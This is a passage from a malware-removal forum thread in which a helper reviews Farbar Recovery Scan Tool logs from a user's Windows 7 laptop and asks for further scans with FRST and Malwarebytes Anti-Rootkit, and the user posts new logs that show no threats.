CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Program Files (x86)\Citrix\GoToMeeting\1009\G2MOutlookAddin64.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-1987813687-3303645166-2786259458-1001_Classes\CLSID\{E8CF3E55-F919-49D9-ABC0-948E6CB34B9F}\InprocServer32 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\psuser_64.dll (Google Inc.)
==================== Restore Points =========================
02-11-2014 03:30:39 End of disinfection
03-11-2014 22:05:12 Windows Update
07-11-2014 02:21:37 Windows Update
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2009-07-13 21:34 - 2014-11-03 15:18 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Scheduled Tasks (whitelisted) =============
(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)
Task: {372C798C-A5B3-4AA4-BBF2-B7E73240D486} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {503D3F2D-3467-4AD0-AB8F-6DC6CC77FC61} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {795C9DD4-84DD-4612-B8E5-6C26954A7C70} - System32\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe [2012-03-26] (Intel Corporation)
Task: {7A4BB95A-5FCC-432C-90F8-E7E4AB110F1C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe [2013-10-27] (Google Inc.)
Task: {C5E1112F-43F2-4BEE-99A2-79ADA35DF515} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)
Task: {F741AF84-829D-46EF-8DB7-4841CBC7DCCE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001Core.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1987813687-3303645166-2786259458-1001UA.job => C:\Users\Ryan\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => c:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
==================== Loaded Modules (whitelisted) =============
2011-04-25 10:24 - 2011-04-25 10:24 - 00034304 _____ () C:\Windows\System32\ssj1mlm.dll
2012-04-27 17:43 - 2012-03-19 17:09 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2012-03-09 08:58 - 2012-03-09 08:58 - 00462712 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
2012-03-09 08:58 - 2012-03-09 08:58 - 00057208 _____ () C:\Program Files\Common Files\Common Desktop Agent\CDASrvPS.dll
2012-04-17 11:20 - 2012-04-17 11:20 - 00293376 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\vCapture64.dll
2012-03-28 13:15 - 2012-03-28 13:15 - 00013824 _____ () C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\WMI_DLL64.dll
2012-04-27 17:03 - 2012-03-28 09:36 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-01-20 13:16 - 2014-01-20 13:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2012-05-18 18:30 - 2012-05-03 16:56 - 00089600 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspLib.dll
2012-05-18 18:30 - 2012-05-03 11:48 - 00093696 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\move_ctrl.dll
2012-05-18 18:30 - 2012-04-20 18:11 - 00034816 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\KbdHook.dll
2012-05-18 18:30 - 2012-03-15 12:19 - 00241664 _____ () C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\vCapture.dll
2012-04-27 17:03 - 2012-03-28 09:18 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (whitelisted) =========
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
AlternateDataStreams: C:\Windows:nlsPreferences
==================== Safe Mode (whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ESETOlmarikOlmascoCleaner.sys => ""="Driver"
==================== EXE Association (whitelisted) =============
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
==================== MSCONFIG/TASK MANAGER disabled items =========
(Currently there is no automatic fix for this section.)
========================= Accounts: ==========================
Administrator (S-1-5-21-1987813687-3303645166-2786259458-500 - Administrator - Disabled)
Guest (S-1-5-21-1987813687-3303645166-2786259458-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1987813687-3303645166-2786259458-1003 - Limited - Enabled)
Ryan (S-1-5-21-1987813687-3303645166-2786259458-1001 - Administrator - Enabled) => C:\Users\Ryan
UpdatusUser (S-1-5-21-1987813687-3303645166-2786259458-1000 - Limited - Enabled) => C:\Users\UpdatusUser
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 04:11:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
Error: (11/05/2014 05:41:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
System errors:
=============
Error: (11/07/2014 03:53:51 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/07/2014 01:39:10 AM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/06/2014 09:11:04 PM) (Source: BTHUSB) (EventID: 17) (User: )
Description: The local Bluetooth adapter has failed in an undetermined manner and will not be used. The driver has been unloaded.
Error: (11/06/2014 04:11:26 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/05/2014 05:40:52 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 10:19:29 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 03:29:58 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 03:24:36 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/04/2014 00:41:25 AM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Error: (11/03/2014 09:32:20 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: The following boot-start or system-start driver(s) failed to load:
cdrom
Microsoft Office Sessions:
=========================
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9984
Error: (11/07/2014 03:59:00 AM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 9922
Error: (11/06/2014 08:09:31 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (11/06/2014 04:11:51 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: WmiApRplWmiApRpl8F20300004D070000
Error: (11/05/2014 05:45:53 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: Performance1637070000000000000000000009030000
Error: (11/05/2014 05:41:08 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
CodeIntegrity Errors:
===================================
Date: 2014-11-03 15:18:28.899
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2014-11-03 15:18:28.884
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Percentage of memory in use: 23%
Total physical RAM: 8085.95 MB
Available physical RAM: 6189.41 MB
Total Pagefile: 16170.07 MB
Available Pagefile: 13611.34 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:919.21 GB) (Free:829.67 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 868B7EFA)
Partition 1: (Active) - (Size=600 MB) - (Type=27)
Partition 2: (Not Active) - (Size=919.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=11.7 GB) - (Type=27)
==================== End Of Log ============================
Good
What TDSSKiller alerted us to were unsigned files but to legitimate applications.
Sorry you had to make multiple posts but I knew the logs would be long.
OK, what to do next.
I would like to see a new FRST log including the Addition.txt.
Run FRST
Don't change the checkboxes, just click on Scan.
https://dl.dropboxusercontent.com/u/73555776/frst.JPG
Ensure there is a check mark for Addition.txt
Logfiles are created on your desktop.
Post the FRST.txt
- Please also paste that along with the FRST.txt into your reply.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Please do the above and also include
Please download Malwarebytes Anti-Rootkit (http://www.malwarebytes.org/products/mbar/) and save it to your desktop.
Be sure to print out and follow the instructions provided on that same page for performing a scan.
Caution: This is a beta version so also read the disclaimer and back up (http://support.microsoft.com/kb/971759) all your data before using.
When the scan completes, click on the Cleanup button to remove any threats found and reboot the computer if prompted to do so.
Perform another scan with Malwarebytes Anti-Rootkit to verify that no threats remain. If they do, then click Cleanup once more and repeat the process.
If there are problems with Internet access, Windows Update, Windows Firewall or other system issues, run the fixdamage tool located in the folder Malwarebytes Anti-Rootkit was run from and reboot your computer.
Two files (mbar-log-YYYY-MM-DD, system-log.txt) will be created and saved within that same folder.
Copy and paste the contents of these two log files in your next reply.
Note: Further documentation can be found in the ReadMe.rtf file which is located in the Malwarebytes Anti-Rootkit folder.
Should I go ahead and run the OTL tool you recommended a few posts back but I never ran?
Let me see the above logs first.
ascot1340
2014-11-08, 01:43
I've pasted the FRST and Malwarebytes Anti-Rootkit logs below. The Malwarebytes Anti-Rootkit didn't detect any threats so there was no cleanup.
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-11-2014
Ran by Ryan (administrator) on RYAN-PC on 07-11-2014 18:13:48
Running from C:\Users\Ryan\Desktop
Loaded Profiles: UpdatusUser & Ryan (Available profiles: UpdatusUser & Ryan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\Jhi_service.exe
(Nalpeiron Ltd.) C:\Windows\SysWOW64\nlssrv32.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Sentelic Corporation) C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe
(SRS Labs, Inc.) C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Atheros Commnucations) C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
() C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe
(GARMIN Corp.) C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(VIZIO Computer Inc.) C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
() C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [FspUip] => C:\Program Files (x86)\VIZIO\VIZIO Wireless Touchpad\FspUip.exe [5406104 2012-05-01] (Sentelic Corporation)
HKLM\...\Run: [SRS Premium Sound HD] => C:\Program Files\SRS Labs\SRS Control Panel\SRSPanel_64.exe [2170752 2012-05-09] (SRS Labs, Inc.)
HKLM\...\Run: [AtherosBtStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [1020064 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [AthBtTray] => C:\Program Files (x86)\Bluetooth Suite\AthBtTray.exe [800416 2012-02-13] (Atheros Commnucations)
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [CDAServer] => C:\Program Files\Common Files\Common Desktop Agent\CDASrv.exe [462712 2012-03-09] ()
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [291608 2012-02-26] (Intel Corporation)
HKLM-x32\...\Run: [OSD Utility] => C:\Program Files (x86)\VIZIO\VIZIO_FN_Key_Utility\XVx.exe [7892992 2012-04-27] (VIZIO Computer Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe [40336 2014-09-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43848 2014-02-12] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\Run: [ANT Agent] => C:\Program Files (x86)\Garmin\ANT Agent\ANT Agent.exe [14731776 2013-02-15] (GARMIN Corp.)
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_15_0_0_167_ActiveX.exe [854704 2014-09-23] (Adobe Systems Incorporated)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [260928 2012-03-14] (NVIDIA Corporation)
AppInit_DLLs-x32: C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [215360 2012-03-14] (NVIDIA Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x7EF78E2F6EF8CF01
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: CIESpeechBHO Class -> {8D10F6C4-0E01-4BD4-8601-11AC1FDF8126} -> C:\Program Files (x86)\Bluetooth Suite\IEPlugIn.dll (Atheros Commnucations)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: HKLM-x32 {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Tcpip\Parameters: [DhcpNameServer] 192.168.200.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\Ryan\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\Ryan\AppData\Local\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
Chrome:
=======
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AtherosSvc; C:\Program Files (x86)\Bluetooth Suite\adminservice.exe [106144 2012-02-13] (Atheros Commnucations) [File not signed]
R2 ekrn; C:\Program Files\ESET\ESET NOD32 Antivirus\x86\ekrn.exe [1337752 2013-09-12] (ESET)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [128280 2012-03-28] ()
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165144 2012-03-28] (Intel Corporation)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [23784 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [368624 2014-08-22] (Microsoft Corporation)
R2 nlsX86cc; C:\Windows\SysWOW64\nlssrv32.exe [66560 2012-11-12] (Nalpeiron Ltd.) [File not signed]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2011-03-01] (Microsoft Corporation)
R3 CirrusLFD; C:\Windows\System32\DRIVERS\CSLFDx64.sys [35840 2012-04-02] (Cirrus Logic)
S3 ESETOlmarikOlmascoCleaner; C:\Windows\system32\Drivers\ESETOlmarikOlmascoCleaner.sys [156360 2014-04-11] ()
